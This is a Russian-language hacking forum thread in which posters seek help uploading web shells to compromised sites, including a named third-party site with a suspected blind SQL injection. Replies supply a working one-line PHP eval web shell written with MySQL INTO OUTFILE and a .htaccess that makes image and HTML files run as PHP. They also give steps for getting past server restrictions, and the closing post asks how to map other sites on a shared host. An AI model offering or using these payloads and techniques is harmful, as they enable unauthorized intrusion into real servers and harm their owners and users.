пытаюсь залить шелл (я могу заливать zip архивы, а на сервере он сам распаковывается), сам файл норм. заливается, но при открытии shell.php выскакивает ошибка: я так понял это из-за htaccess, попробовал залить свой htaccess с содержимым но при попытки открыть shell.png он просто скачивается. вообщем я хз что делать...
ребят,подскажите,плз...в какую сторону копать?)... сканнер показывает blind-sql здесь в параметре mna : http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=Search&sexarray[]=male&srch=y&srchsexarray=1&mna=-89 http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=Search&sexarray[]=male&srch=y&srchsexarray=1&mna=89 здесь ошибка с раскрытием путей: http://www.sexopera.eu/searchlo.php?aid=c1&defcountry=143&mxa=18&search=Search&sexarray=male&srch=y&srchsexarray=1 можно ли раскрутить это скулю или это ошибка сканнера?
подскажите, имеется доступ к mysql.root, как можно залить шел на сервере, CMS DLE 9,5 я делаю по 2 запроса одного типа первый и второй сам шелл оба запроса в одну папку разумеется всё заливается, и htaccess и шелл, но шел не открывает, хотя htaccess стоит "вроде бы" как положено.. Так же html и другие форматы заливаются типа .xss формат но уже Internal Server Error кажет Что ещё можно залить вместо моего htaccess ?
либо я так сильно спать хочу и чего-то не понимаю, либо ты наркоман, но что мешает сделать into outfile в PHP файл?
Прочитай .htaccess, может, там какие-то хитрые фильтры стоят при записи(то есть убедись, что все записалось нормально, нет лишних символов, перенос строки выполнен правильно) Ну и да, как d1v сказал выше, что тебе мешает выполнить запрос select '<?php eval($_REQUEST[a]); ?>' from mysql.user into outfile '/var/www/user/data/www/sait.idu/uploads/posts/2011-01/thumbs/s.php'
Сделал вот такой запрос Всё равно не хочет jpg как php обрабатыватся простой php тоже не обрабатывается
Слишком мало вводной информации. Что значит не хочет обрабатываться? 500 ошибка, предложение скачать файл или простое отображение кода без его интерпретации? Заливай .htaccess PHP: Options +Indexes php_flag engine on AddType application/x-httpd-php .ololo .phtml .jpg .html .php .php3 AddHandler application/x-httpd-php .ololo .phtml .jpg .html .php .php3 Первая строчка позволит тебе шариться по директории из веба, если вдруг у тебя нет такой возможности сейчас, что убыстрит процесс. Потом заливай последовательно в .phtml, .php, .php3 Алгоритм - залился в формат одного вида, смотришь из веба как ведет себя файл(500 ошибка, предложение скачивания, только текст). И так по всем расширениям. От этого уже и нужно отталкиваться, а пока это гадание на кофейной гуще.
Вот если заливаю прямо php файл то сейчас вывалилось 500 (как и раньше) если jpg то пишет что поврежденное изображение (если открыть в Осле то виден код как будто txt) если другие форматы то тоже 500
У меня такая проблема , раньше заливал шелл через ftp на сайт все норм было , сейчас мы видим вот такую картину Что мне делать ? и как обойти ?
Попробуй AddType application/x-httpd-php .php в .htaccess в данной папке впихнуть. На изображении же четко и ясно видно в чем дело - файл не исполняется а вываливает php-html код как есть на страницу. Значит сие что обработчик типа убрали для данной папки. Если на апаче включена опция, позволяющая серверу перопределяться дочерними правилами .htaccess , то по идее должно сработать. В случае, если базовый конфиг апача или корневой .thaccess задают для данной директории обдуление .php и не позволяют переопределяться для .htaccess то в данной директории скорее всего ничего не сделаешь.
Подскажите пожалуйста, как имея шелл на 1 сайте, узнать урлы всех сайтов сервака. То есть есть доступ в другие папки (сайты), но по названиям не понятно, что это за адреса. Варианты посмотреть файлы robots, htaccess, configuration, sitemap и найди myphpadmin не предлагать ) Это само собой.. Заранее огромное спасибо!
